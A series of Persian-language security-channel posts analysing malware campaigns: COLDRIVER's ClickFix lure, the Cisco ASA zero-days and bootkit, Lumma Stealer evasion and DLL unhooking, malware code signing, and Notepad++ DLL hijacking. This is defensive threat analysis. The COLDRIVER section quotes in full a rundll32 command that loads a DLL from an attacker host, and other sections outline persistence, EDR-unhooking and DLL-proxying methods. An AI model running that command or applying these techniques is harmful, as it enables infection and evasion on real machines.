✅#COLDRIVER

تحلیل حملات COLDRIVER با بدافزارهای BAITSWITCH و SIMPLEFIX

گروه روسی COLDRIVER (که با نام‌های Star Blizzard و Callisto نیز شناخته می‌شود) و شهرت آن در هدف‌گیری فعالان جامعه مدنی، روزنامه‌نگاران و گروه‌های اپوزیسیون است، زرادخانه خود را با دو بدافزار جدید به‌روزرسانی کرده است: BAITSWITCH (Downloader) و SIMPLEFIX (PowerShell Backdoor). این کمپین جدید که در سپتامبر ۲۰۲۵ کشف شد، تمرکز بر تکنیک‌های مهندسی اجتماعی داشته و از یک زنجیره آلودگی پیچیده چندمرحله‌ای برای حفظ پایداری و جمع‌آوری اطلاعات استفاده می‌کند.

۱. مکانیزم حمله و مهندسی اجتماعی (ClickFix)

این حمله با تکیه بر ضعف کاربر، از روش ClickFix استفاده می‌کند که اگرچه از نظر فنی پیچیده نیست، اما برای اهداف گروه COLDRIVER بسیار مؤثر بوده است.

1. طراحی فریب: قربانی به صفحه‌ای هدایت می‌شود که خود را به عنوان یک منبع اطلاعاتی برای فعالان مدنی روس معرفی می‌کند. این صفحه یک چک‌باکس جعلی Cloudflare Turnstile نمایش می‌دهد.

2. اجرای دستوری: با کلیک کاربر، کد JavaScript صفحه یک دستور مخرب (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) را در کلیپ‌بورد کپی می‌کند. سپس کاربر فریب داده می‌شود تا این دستور را در دیالوگ باکس Windows Run (Win + R) جای‌گذاری و اجرا کند.

3. فایل فریب (Decoy): بلافاصله پس از اجرا، قربانی به یک داکیومنت فریبنده با میزبانی Google Drive هدایت می‌شود تا توجه وی از فرآیند آلودگی منحرف شود.
این اقدام منجر به اجرای فایل machinerie.dll که همان بدافزار BAITSWITCH است، از طریق تابع rundll32.exe می‌شود.

۲۔ BAITSWITCH: مهندسی پایداری و Staging
۔ BAITSWITCH (Machinerie.dll) یک Downloader چند وظیفه‌ای است که وظیفه اصلی آن برقراری پایداری و آماده‌سازی سیستم برای استقرار SIMPLEFIX است.

الف. تکنیک‌های دفاعی

*۔ Traffic Signaling: این بدافزار از یک User-Agent استرینگ (Mozilla/5.0...Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) برای برقراری ارتباط با سرور C2 استفاده می‌کند. سرور C2 تنها در صورت دریافت این User-Agent مشخص پاسخ می‌دهد و در غیر این صورت، پاسخ 404 Not Found ارسال می‌کند. این یک مکانیزم ساده و مؤثر برای جلوگیری از تحلیل خودکار و شناسایی توسط ساندباکس‌ها است.

# ب. زنجیره فرماندهی (Command Chain)

۔BAITSWITCH یک توالی پنج مرحله‌ای از درخواست‌های HTTP به دامنه‌های تحت کنترل مهاجم (captchanom[.]top) را اجرا می‌کند که هر کدام منجر به اجرای دستورات حیاتی می‌شوند:

1۔ Persistence: اجرای دستور reg add برای تنظیم کلید رجیستری UserInitMprLogonScript در HKCU\Environment. این کلید تضمین می‌کند که اسکریپت PowerShell نهایی در ورود بعدی کاربر به سیستم اجرا شود.

2۔ Fileless Storage : اجرای PowerShell برای ذخیره اسکریپت مخرب نهایی که به‌صورت Base64-encoded و AES-encrypted است و همچنین کلید Decryption آن، در کلیدهای رجیستری (مانند EnthusiastMode و QatItems ) مربوط به یک CLSID کاذب. این یک تکنیک Defense Evasion قوی برای پنهان کردن Payload است.

3۔ Download Stager: دانلود اسکریپت Stager اولیه PowerShell و ذخیره آن در مسیر %APPDATA% (همان فایلی که در مرحله پایداری به آن ارجاع داده شده است).

4۔ Indicator Removal: حذف کلید رجیستری RunMRU که حاوی تاریخچه دستورات اجرا شده در دیالوگ باکس Run است، برای پاک کردن ردپای حمله ClickFix.

5۔ Victim Registration: ارسال نام میزبان (Hostname) قربانی به C2 برای ثبت موفقیت‌آمیز آلودگی.

۳۔ SIMPLEFIX: Backdoor مبتنی بر PowerShell و جمع‌آوری اطلاعات

در ورود مجدد کاربر، اسکریپت Stager اولیه اجرا می‌شود. این اسکریپت به‌صورت Fileless ، اسکریپت AES-encrypted را از رجیستری خوانده، آن را با استفاده از ترکیب کلید Hardcoded و پارامتر خط فرمان، رمزگشایی و اجرا می‌کند. خروجی نهایی، بدافزار SIMPLEFIX است.

# الف. مکانیزم‌های C2 و شناسایی (Discovery)

*۔ Beaconing (ارسال سیگنال): SIMPLEFIX هر ۳ دقیقه یک بار اقدام به برقراری ارتباط با C2 (southprovesolutions[.]com) می‌کند.

*۔ User-Agent داینامیک: SIMPLEFIX یک User-Agent منحصر به فرد با ترکیب نام کامپیوتر، نام کاربری و UUID ماشین تولید می‌کند که در تمام درخواست‌های C2 گنجانده می‌شود. این تکنیک به مهاجم کمک می‌کند تا قربانیان را در سمت سرور به دقت شناسایی کند (T1033).

✅#Cisco

🔥 از Zero-Day RCE سیسکو (CVE-2025-20333)
تا بوت‌کیت RayInitiator در GRUB 💀

تحلیل آسیب‌پذیری و بهره‌برداری در Cisco

سیر تحولی یک رویداد امنیتی حیاتی در پلتفرم‌های Cisco Secure Firewall ASA و FTD و یک عملیات سایبری بسیار پیشرفته و Zero-Day در سطح APT است که مستلزم اقدامات دفاعی فوری می‌باشد.

خلاصه و ترکیب آسیب‌پذیری‌ها (CVE Correlation)

آسیب‌پذیری اصلی، نقص بحرانی Remote Code Execution (RCE) در مؤلفه VPN Web Server است که هنگام فعال بودن سرویس‌های AnyConnect SSL VPN یا Webvpn قابل بهره‌برداری است.

CVE-2025-20333 => ۹.۹ (Critical) => هسته RCE => Buffer Overflow (CWE-120)
آسیب‌پذیری اصلی RCE: امکان اجرای کد دلخواه با دسترسی Root. بهره‌برداری فعال توسط APT**ها. رسماً نیاز به **Credentials VPN دارد.

CVE-2025-20362 => ۶.۵ (Medium) => پیش‌نیاز (Pre-Auth) => Unauthorized Access
نقص دور زدن احراز هویت: مهاجم را قادر می‌سازد تا بدون Credential به Endpointهای محدود VPN دست یابد. پتانسیل بالای اتصال به CVE-2025-20333 در یک Attack Chain.

CVE-2025-20363 => ۹.۰ (Critical) => گزارش اولیه => Input Validation Flaw (CWE-122)
گزارش اولیه و ناهمگون: مربوط به Input Validation. احتمالاً یک نقص کلی مرتبط یا گزارش اولیه است که توسط CVE-2025-20333 با دقت بیشتری (Buffer Overflow) توصیف شد.

نکته فنی: هرچند CVE-2025-20333 رسماً نیاز به احراز هویت دارد، اما وجود CVE-2025-20362 یک تهدید جدی برای ایجاد زنجیره حمله (Attack Chain) فراهم می‌کند که می‌تواند نیاز به Credential معتبر را حذف کرده و RCE را به یک عملیات Pre-Authentication RCE تبدیل کند.

تحلیل APT و بدافزارهای استقراری

این کمپین توسط یک عامل تهدید دولتی (State-Sponsored Threat Actor) با هدف جاسوسی سایبری انجام شده و از یک ابزار جنگی دو مرحله‌ای بسیار پیشرفته استفاده می‌کند:

۱۔ RayInitiator (بوت‌کیت: Persistence در سطح GRUB)

این بدافزار، یک Multi-Stage Bootkit است که مستقیماً برای ایجاد پایداری (Persistence) عمیق و مقاوم طراحی شده است.

* مکانیسم: RayInitiator خود را در Grand Unified Bootloader (GRUB) دستگاه Flash می‌کند.

* مزیت APT: این مکانیسم به بدافزار اجازه می‌دهد تا از ریبوت‌های سیستمی و حتی بروزرسانی‌های معمول Firmware جان سالم به در ببرد و یک Foot-hold دائمی و بسیار دشوار برای حذف ایجاد کند.

* هدف: به‌طور خاص مدل‌های قدیمی‌تر Cisco ASA 5500-X Series را هدف قرار می‌دهد که فاقد فناوری Secure Boot هستند.

۲۔ LINE VIPER (Payload Memory-Resident: ضد بدافزارکاوی)

این بدافزار، یک Shellcode Loader است که مستقیماً در حافظه (Memory-Resident) اجرا می‌شود و بخش اصلی کنترل مهاجم را فراهم می‌کند:

* اجرای فرمان: امکان اجرای دستورات با بالاترین سطح دسترسی (Privilege Level 15).

۔ Data Exfiltration تخصصی: قابلیت انجام Packet Capture مخفیانه از پروتکل‌های احراز هویت حیاتی شبکه شامل RADIUS، LDAP و TACACS برای سرقت Credentials (اعتبارنامه‌ها).

۔ Evasion و Anti-Forensics: یکی از پیشرفته‌ترین تاکتیک‌های آن، قابلیت ریبوت فوری دستگاه در صورت تلاش مدیران برای گرفتن Core Dump یا اجرای دستورات خاص تحلیلی است. این اقدام، تلاش‌های تحلیلگران برای بدافزارکاوی (Malware Analysis) را مختل می‌کند.

۔ C2 پیچیده: استفاده از کانال‌های رمزگذاری‌شده HTTPS WebVPN و همچنین یک کانال ثانویه C2 با استفاده از ICMP Tunneling درون یک جلسه VPN، که شناسایی ارتباطات فرمان و کنترل را بسیار سخت می‌کند.

نتیجه‌گیری و راهکارهای مقابله پیشرفته

با توجه به ماهیت APT و سطح نفوذ (Root Shell و Bootkit)، تنها راه مقابله، مدیریت سریع Incident و اعمال تغییرات ساختاری است.

الف) راهکار حاد و فوری (Emergency Response)

۱۔ Patching اضطراری (Urgent Patching): هیچ Workaround مؤثری وجود ندارد. سازمان‌ها باید فوراً تمامی دستگاه‌های ASA/FTD را با استفاده از Cisco Software Checker به آخرین نسخه‌های اصلاح‌شده ارتقاء دهند.

۲۔ Audit پیکربندی VPN: با استفاده از دستور show running-config ، فعال بودن سرویس‌های Webvpn یا AnyConnect SSL VPN را بررسی و در صورت عدم امکان Patching فوری، آن‌ها را موقتاً غیرفعال کنید (با علم به تأثیر آن بر Business Continuity).

۳. شکار تهدید (Threat Hunting):

* در اسرع وقت قوانین YARA مرتبط با RayInitiator و LINE VIPER را در سیستم‌های تشخیص تهدید (Threat Detection Systems) خود پیاده‌سازی کنید.

* مراقب شاخص آلودگی (IOC) کلیدی باشید: هرگونه ریبوت غیرمنتظره دستگاه ASA پس از تلاش برای گرفتن Core Dump، باید به‌عنوان یک هشدار قطعی آلودگی به LINE VIPER تلقی شود.

✅#LummaStealer

🟥 ظهور تکامل یافته‌تر بدافزار Lumma Stealer

بدافزار Lumma Stealer که توسط مجرمان سایبری در بخش‌های مختلف (از جمله مخابرات، بهداشت، بانکداری و بازاریابی) مورد استفاده قرار می‌گرفت، با واریانت‌های جدید ظاهر و نشان‌دهنده یک تهدید سایبری جاری و تکامل یافته‌تر است.

* ساختار و زنجیره آلودگی

تحلیل نمونه‌ای از این بدافزار با هش 87118baadfa7075d7b9d2aff75d8e730 نشان می‌دهد که Lumma Stealer از ابزارهای قانونی برای پنهان‌کاری استفاده می‌کند، تاکتیکی که اغلب توسط APTها برای دور زدن راهکارهای امنیتی سنتی به کار می‌رود.

1. بسته نصب‌کننده: نمونه تحلیل‌شده یک فایل NSIS (Nullsoft Scriptable Install System) است. مهاجمان با سوءاستفاده از این ابزارهای قانونی و پرکاربرد، نرخ تشخیص اولیه را پایین نگه می‌دارند.

2. استخراج اجزا: پس از استخراج (توسط ابزاری مانند 7z)، دو جزء کلیدی ظاهر می‌شوند:

الف " [NSIS].nsi: یک اسکریپت NSIS Obfuscated که زنجیره آلودگی را با فراخوانی Parish.m4a آغاز می‌کند.

ب : Parish.m4a: یک (Batch File) مبهم‌سازی شده که مسئول اجرای مرحله بعد است. سایر فایل‌های با پسوند *.m4a حاوی Blobs داده‌های رمزنگاری شده برای Payload اصلی هستند.

3. سوءاستفاده از AutoIt: اسکریپت دسته‌ای، فایل اجرایی قانونی autoit3.exe را به همراه یک فایل اسکریپت مخرب با پسوند .a3x اجرا می‌کند. AutoIt یک زبان اسکریپت‌نویسی قانونی برای اتوماسیون وظایف در ویندوز است، اما در اینجا برای مقاصد غیرقانونی مورد سوءاستفاده قرار می‌گیرد.

4. کد مبهم‌سازی شده AutoIt: اسکریپت A3X با استفاده از تکنیک‌هایی مانند حلقه while و ساختار switch-case مبهم‌سازی شده تا تحلیل استاتیک آن دشوار باشد. پس از ابهام‌زدایی، اسکریپت نهایی حاوی منطق اصلی بدافزار از جمله تکنیک‌های پایداری و فرار است.

* مکانیزم های فرار پیشرفته

بدافزار Lumma Stealer از چندین تکنیک پیشرفته و سطح بالا برای جلوگیری از تحلیل در محیط‌های Sandbox و ابزارهای امنیتی استفاده می‌کند:

۱. بررسی محیط اجرا

بدافزار پیش از اجرای کامل Payload، محیط را برای تشخیص Sandbox یا ماشین‌های مجازی اسکن می‌کند. این کار با بررسی موارد زیر صورت می‌گیرد:

* نام کامپیوتر (COMPUTERNAME)

* نام کاربری (USERNAME)

* وجود پردازش‌های ابزار مجازی‌سازی: جستجوی پردازش‌هایی مانند vmtoolsd.exe (VMware), VboxTray.exe (VirtualBox) و SandboxieRpcSs.exe (Sandboxie).

* وجود پردازش‌های آنتی‌ویروس: جستجوی پردازش‌هایی مانند avastui.exe.

۲. تکنیک (Anti-debugging)

این بدافزار از اختلاف در مدیریت زمان و سرعت اجرا بین سیستم‌های واقعی و محیط‌های تحلیلی سوءاستفاده می‌کند. این تاکتیک با اندازه‌گیری زمان صرف‌شده برای اجرای یک قطعه کد یا توقف‌های مصنوعی، می‌تواند حضور یک دیباگر را تشخیص دهد.

۳. بررسی (Anti-analysis)

این نمونه تلاش می‌کند تا با پینگ کردن یک دامنه‌ی ساختگی/غیرواقعی (Fabricated Domain) ، محیط را بررسی کند. اگر دامنه در دسترس باشد، ممکن است نشان‌دهنده یک محیط کنترل‌شده (مانند Sandbox) باشد که ترافیک شبکه را شبیه‌سازی می‌کند. در این صورت، پردازش AutoIt خودکشی (self-terminates) می‌کند.

۴. انجام (DLL Unhooking)

این یک تکنیک پیشرفته دفاعی است که اغلب در بدافزارهای APT level دیده می‌شود.

* نرم‌افزارهای امنیتی (مانند EDRها) برای نظارت و مسدود کردن فراخوانی‌های حیاتی API ویندوز (مثل NtCreateProcess در ntdll.dll)، شروع توابع را Hook می‌کنند (یعنی بایت‌های اولیه تابع را تغییر می‌دهند تا اجرا به کد امنیتی هدایت شود).

*۔ Lumma Stealer با بازیابی بایت‌های اصلی و Unhook شده تابع در حافظه، کنترل امنیتی را باطل می‌کند و اجازه می‌دهد فراخوانی‌های مخرب API بدون نظارت اجرا شوند.

۵. مکانیزم پایداری
بدافزار برای حفظ دسترسی در سیستم آلوده، از روش ایجاد یک میانبر اینترنتی (.url) در پوشه Startup ویندوز استفاده می‌کند. این میانبر پس از راه‌اندازی سیستم، یک JScript را اجرا می‌کند که با استفاده از Wnoscript.Shell ، Payload نهایی AutoIt را مجدداً اجرا می‌کند.

مرحله (Next-Stage Payload)

بدافزار Lumma Stealer از تکنیک‌های رمزگشایی و فشرده‌سازی در حافظه برای پنهان کردن Payload نهایی استفاده می‌کند:

* رمزگشایی در حافظه: بدافزار با استفاده از یک تابع خودتعریف، داده‌های رمزنگاری شده را رمزگشایی می‌کند.

* فشرده‌سازی برای پنهان‌کاری بیشتر و کاهش حجم، بدافزار از API ویندوز RtlDecompressFragmentWindows استفاده کرده و داده‌ها را با فرمت LZ Compression (پارامتر 0x2) از حالت فشرده خارج می‌کند.

🟥 مهندسی معکوس: تکنیک DLL Unhooking در بدافزارهای APT

در یک محیط آزمایشگاهی، درک اینکه بدافزاری مانند Lumma Stealer چگونه لایه‌های دفاعی را باطل می‌کند، مستلزم شناخت عمیق از معماری سیستم‌عامل ویندوز و نحوه کارکرد راهکارهای امنیتی نظیر EDR (Endpoint Detection and Response) است.

۱. مکانیزم Hooking توسط راهکارهای امنیتی

راهکارهای امنیتی مدرن (مانند آنتی‌ویروس‌ها و EDRها) برای نظارت بر فعالیت‌های حیاتی یک فرآیند ویندوز، از مکانیزم API Hooking استفاده می‌کنند.

1۔ DLLهای هدف: عموماً توابع حیاتی ویندوز که در DLLهای سطح پایین مانند ntdll.dll (شامل توابع Native API مانند NtCreateProcess , NtWriteFile , NtAllocateVirtualMemory ) و kernel32.dll قرار دارند، هدف این تکنیک هستند.

2۔ فرآیند (Inline Hooking)

* هنگامی که یک فرآیند (مثلاً فرآیند Lumma Stealer) شروع به کار می‌کند، EDR به فضای آدرس آن فرآیند تزریق می‌شود.

* ۔EDR بایت‌های اولیه (Preamble) تابع هدف در حافظه (مثلاً تابع NtCreateProcess در ntdll.dll) را بازنویسی می‌کند.

* این بایت‌های بازنویسی شده معمولاً شامل دستورات JMP یا CALL هستند که اجرای طبیعی تابع را به یک قطعه کد رهگیری در داخل کتابخانه EDR هدایت می‌کنند.

* نتیجه: پیش از اینکه فراخوانی سیستم (Syscall) واقعی به کرنل برسد، EDR فرصت دارد که آرگومان‌ها را بررسی کرده و در صورت مخرب بودن، آن را مسدود کند.

۲. مکانیزم Unhooking توسط بدافزار (Lumma Stealer)

بدافزار Lumma Stealer و سایر بدافزارهای APT برای فرار از این نظارت، این فرآیند را معکوس می‌کنند:

1. هدف: بازگرداندن حافظه تابع Hook شده به حالت اصلی و تمیز آن.

2. منبع داده اصلی: بدافزار برای به دست آوردن کدهای اصلی و Unhook شده، از تکنیک‌های زیر استفاده می‌کند:

* بارگیری مجدد DLL : بدافزار می‌تواند نسخه تمیز DLL هدف (مثلاً ntdll.dll) را مجدداً بارگیری کند، اما نه در فضایی که توسط ویندوز استفاده می‌شود (معمولاً با استفاده از LoadLibraryEx با پرچم‌های خاص). سپس بایت‌های اولیه تابع هدف را از این نسخه جدید خوانده و کپی می‌کند.

* خواندن از دیسک: بدافزار می‌تواند به طور مستقیم فایل DLL اصلی (مثلاً C:\Windows\System32\ntdll.dll ) را از دیسک بخواند و Preamble اصلی تابع را استخراج کند. این روش رایج‌تر و قابل اعتمادتر است، چرا که نسخه روی دیسک (معمولاً) دستکاری نشده است.

3. بازنویسی حافظه (Memory Overwrite):

* بدافزار تابع VirtualProtect را فراخوانی می‌کند تا دسترسی به حافظه آن بخش از ntdll.dll را از READ/EXECUTE به READ/WRITE/EXECUTE تغییر دهد.

* بایت‌های اصلی استخراج‌شده (Preamble تمیز) را روی حافظه تابع Hook شده کپی می‌کند.

* دسترسی حافظه را دوباره به حالت اولیه READ/EXECUTE برمی‌گرداند.

نتیجه Unhooking: از این لحظه به بعد، هر فراخوانی سیستم از داخل فرآیند بدافزار به آن تابع (مثلاً NtCreateProcess) مستقیماً به هسته سیستم عامل هدایت می‌شود و راهکار امنیتی (EDR) در عمل کور می‌شود و نمی‌تواند آن فعالیت را نظارت یا مسدود کند.

پیاده‌سازی و تحلیل در محیط آزمایشگاهی

ابزارهای مورد نیاز:

*۔ Debugger/Disassembler: IDA Pro / Ghidra / x64dbg

* زبان برنامه‌نویسی: Python (برای اسکریپت‌نویسی) و ++C یا Assembly (برای ساخت PoC)

* سیستم‌عامل: ویندوز ۱۰/۱۱ (در محیط VM)

مراحل شبیه‌سازی دفاعی (Defense PoC):

برای درک عمیق‌تر، می‌توانیم یک PoC (Proof of Concept) با Python و کتابخانه ctypes برای تزریق کد یا یک DLL ساده با ++C/C برای Hooking بسازیم.

1۔ Hooking اولیه: تابعی را در ntdll.dll (مانند NtResumeThread) انتخاب کرده و یک JMP به تابع رهگیری خودتان تزریق کنید.

2۔ تحلیل Unhooking (Reverse Engineering):

* بدافزار Lumma Stealer را در x64dbg اجرا کنید.

*۔ Breakpoint را روی توابع کلیدی ویندوز تنظیم کنید:

*۔ LoadLibraryExW: برای رصد تلاش جهت بارگیری مجدد ntdll.dll.

*۔ CreateFileW / ReadFile: برای رصد تلاش برای خواندن ntdll.dll از دیسک.

*۔ VirtualProtect: این مهم‌ترین Breakpoint است. هر فراخوانی به VirtualProtect که دسترسی حافظه DLLهای سیستمی را به WRITE تغییر دهد، نشان‌دهنده یک Unhooking قریب‌الوقوع است.

با دنبال کردن اجرای کد پس از VirtualProtect ، می‌توانید دقیقاً متوجه شوید که بدافزار چگونه بایت‌های اصلی را محاسبه یا بازیابی کرده و آن‌ها را بر روی حافظه Hook شده می‌نویسد.

@NullError_ir

🟥 خودکشی فرآیند (Process Self-Termination) یعنی چه؟

مکانیزم پیشرفته ضدتحلیل

خودکشی پردازشی یا Self-Termination یکی از تاکتیک‌های کلیدی در بدافزارهای مدرن مانند Lumma Stealer است. این تکنیک یک اقدام دفاعی نهایی است که بدافزار برای جلوگیری از تحلیل خود در محیط‌های کنترل‌شده، مانند Sandboxها و ماشین‌های مجازی (VMs) به کار می‌گیرد.

بر خلاف پایان دادن عادی به یک فرآیند (ExitProcess) ، خودکشی پردازشی در بدافزارها با یک مکانیزم تصمیم‌گیری پیشرفته گره خورده است که بر مبنای یافته‌های (Anti-Analysis) عمل می‌کند.

۱. معماری تصمیم‌گیری (Decision Architecture)

خودکشی پردازشی هرگز به صورت تصادفی رخ نمی‌دهد، بلکه نتیجه شکست بدافزار در عبور از تست‌های محیطی است. این فرآیند از الگوریتم‌های شرطی تو در تو (Nested Conditional Logic) استفاده می‌کند:

بررسی فرآیندها/فایل‌های VM (مانند vmtoolsd.exe , VBoxGuestAdditions.sys)

بررسی نام‌های سیستمی (مانند COMPUTERNAME یا USERNAME پیش‌فرض Sandboxها)

بررسی زمان‌بندی و وقفه (Timing and Delay) اجرای سریع و نرم دستورات

بررسی (Debugger Presence) عدم یافتن پرچم BeingDebugged

تست ارتباط شبکه (Fabricated Domain Ping) عدم پاسخگویی به دامنه‌ی ساختگی

۲. مکانیزم‌های فنی خودکشی (Technical Self-Termination Methods)

پس از اینکه بدافزار از طریق تست‌های بالا به قطعیت رسید که در حال تحلیل است، از یکی از روش‌های زیر برای پایان دادن به فرآیند خود استفاده می‌کند:

الف) فراخوانی مستقیم API (Direct API Call)

ساده‌ترین و رایج‌ترین روش، فراخوانی توابع Native API برای خاتمه دادن به فرآیند جاری است:

۔* ExitProcess: این تابع سطح بالا در kernel32.dll است و رایج‌ترین روش خاتمه دادن به فرآیند است.

۔* NtTerminateProcess: این تابع Native API در ntdll.dll است و یک فراخوانی سطح پایین‌تر به هسته است. در بدافزارهای مدرن، اغلب از این تابع استفاده می‌شود تا احتمال Hooking توسط EDRها کمتر شود.

NtTerminateProcess( (HANDLE)-1, 0 );

👆 -1 نشان‌دهنده فرآیند جاری است

ب) تولید استثنای کشنده (Generating Fatal Exception)

یک روش پیشرفته‌تر و پنهان‌تر، مجبور کردن سیستم‌عامل به خاتمه دادن به فرآیند از طریق تولید یک خطای غیرقابل بازیابی (Fatal Exception) است. این کار می‌تواند تحلیلگر را گمراه کند:

* فراخوانی RaiseException با کد خطا: بدافزار می‌تواند عمداً یک استثناء با کدهای خطای خاص (مثلاً STATUS_ILLEGAL_INSTRUCTION) ایجاد کند. اگر بدافزار در یک محیط Sandbox بدون مدیریت استثناء فعال باشد، سیستم‌عامل به سادگی فرآیند را خاتمه می‌دهد.

* دستورات Assembly غیرقانونی (Illegal Instructions): اجرای مستقیم دستورات اسمبلی نامعتبر (مانند INT 3 برای دیباگرها یا دستوراتی که پردازنده فعلی پشتیبانی نمی‌کند) می‌تواند منجر به خطای سخت‌افزاری و خاتمه فرآیند شود.

ج) Self-Overwrite و پاکسازی حافظه (Self-Overwrite and Memory Cleansing)

پیشرفته‌ترین بدافزارها قبل از خودکشی، بخشی از حافظه حیاتی خود را Overwrite کرده یا Unmap می‌کنند.

* هدف: جلوگیری از استخراج Payload نهایی یا کلیدهای رمزگشایی در لحظه مرگ فرآیند.

* روش: استفاده از توابعی مانند VirtualFree برای آزاد کردن نواحی تخصیص یافته حافظه (به خصوص نواحی حاوی Payload مرحله بعد) یا بازنویسی بخش‌های کد با داده‌های تصادفی/صفر (Zero-out) قبل از فراخوانی ExitProcess .

۳. خودکشی هوشمند (Smart Self-Termination) در بدافزارهای امروزی

در بدافزارهای APT، خودکشی پردازشی صرفاً یک پایان ساده نیست، بلکه بخشی از یک استراتژی دفاعی است:

1۔ Delay and Exit: بدافزار ممکن است تشخیص دهد که در حال تحلیل است، اما به جای خاتمه فوری، برای مدت کوتاهی به اجرای عملیات‌های بی‌ضرر ادامه می‌دهد (مثلاً خوابیدن برای یک مدت طولانی با SleepEx یا حلقه‌های طولانی) و سپس به طور ناگهانی خاتمه می‌یابد. این کار باعث می‌شود ابزارهای تحلیل خودکار، قبل از رسیدن به نقطه خودکشی، به دلیل محدودیت زمان اجرا، تحلیل را متوقف کنند و گزارش دهند که بدافزار "فعالیتی نداشته است".

2۔ Clean Exit vs. Crash Exit: بدافزارهای پیچیده تمایل دارند از Clean Exit (خاتمه تمیز با API مانند ExitProcess) استفاده کنند تا فرآیند به طور ناگهانی "Crash" نشود و گزارش خطا یا Dumps حافظه ایجاد نشود که بتواند توسط تحلیلگر بررسی شود.

⬅️ هدف نهایی تحلیلگر بدافزار، نه فقط دور زدن تکنیک، بلکه فهمیدن منطق آن است. ➡️

🔥 دستورالعمل‌های غیرمجاز , بدافزارها و تحلیلگران

🔤🔤🔤 @NullError_ir

✅#SSL

هکرهای APT ایران از گواهینامه‌های SSL.com برای امضای بدافزار استفاده می‌کنند

گروه‌های سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده می‌کنند که در آن با جعل یا سوءاستفاده از گواهی‌های دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) می‌کنند.

### نکات کلیدی فنی و امنیتی

* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستم‌عامل‌ها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتی‌ویروس‌ها) است که اغلب برنامه‌های امضا شده را قابل اعتمادتر و کمتر مخرب تلقی می‌کنند. این امر به بدافزار اجازه می‌دهد تا راحت‌تر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.

* روش‌های دستیابی به گواهی‌ها:

* سرقت گواهی: نفوذ به زیرساخت‌های مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سال‌های گذشته، که در آن هکرها توانستند گواهی‌های جعلی برای دامنه‌های مهم جهانی (مثل گوگل، یاهو) صادر کنند.

* خرید گواهی‌های مسروقه: خرید گواهی‌های معتبر مسروقه از بازارهای زیرزمینی دارک‌نت.

* استفاده از گواهی‌های منقضی/لغو شده: حتی برخی از گواهی‌های لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.

* تأثیر بر شناسایی: امضای معتبر باعث می‌شود بدافزار از لحاظ ظاهری شبیه یک نرم‌افزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سخت‌تر می‌کند و شناسایی آن توسط سامانه‌های مبتنی بر امضا را مختل می‌سازد.

* ارتباط با APTها: این تکنیک به طور مکرر توسط گروه‌های APT ایرانی مشاهده شده است که نشان‌دهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزم‌های امنیتی پایه است.

@NullError_ir

✅Notepad++

آسیب‌پذیری DLL Hijacking در ++Notepad

یک آسیب‌پذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، می‌تواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.

این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخه‌های نصب شده این نرم‌افزار را تحت تأثیر قرار می‌دهد، که میلیون‌ها کاربر را در معرض خطر قرار می‌دهد. این آسیب‌پذیری به یک مهاجم محلی (Local Attacker) این امکان را می‌دهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانه‌های مورد نیاز خود جستجو می‌کند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف می‌کند و می‌تواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.

## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی

۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانه‌های مورد نیاز توسط برنامه‌های ویندوز بهره‌برداری می‌کند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.

یک مهاجم می‌تواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوری‌ای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو می‌شود. هنگامی که کاربر برنامه را راه‌اندازی می‌کند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا می‌شود.

در مورد ++Notepad ، این آسیب‌پذیری می‌تواند با هدف قرار دادن DLLهای مرتبط با پلاگین‌های (Plugins) آن بهره‌برداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم می‌تواند فایل یک پلاگین، مانند NppExport.dll که در مسیر ++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساخته‌شده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.

### تکنیک Proxying برای پنهان‌کاری

برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم می‌تواند DLL اصلی را تغییر نام دهد (مثلاً به original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانی‌های تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.

این تکنیک که به عنوان Proxying یا واسطه‌گری شناخته می‌شود، باعث می‌شود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار داده‌ای مخرب (Malicious Payload) در پس‌زمینه در حال اجرا است.

اندازه فایل NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشان‌دهنده وجود کد متفاوت در آن است.

### اجرای فایل مخرب

پس از راه‌اندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری می‌کند که منجر به اجرای کد مهاجم می‌شود.

## تثبیت دسترسی و راهکارهای مقابله

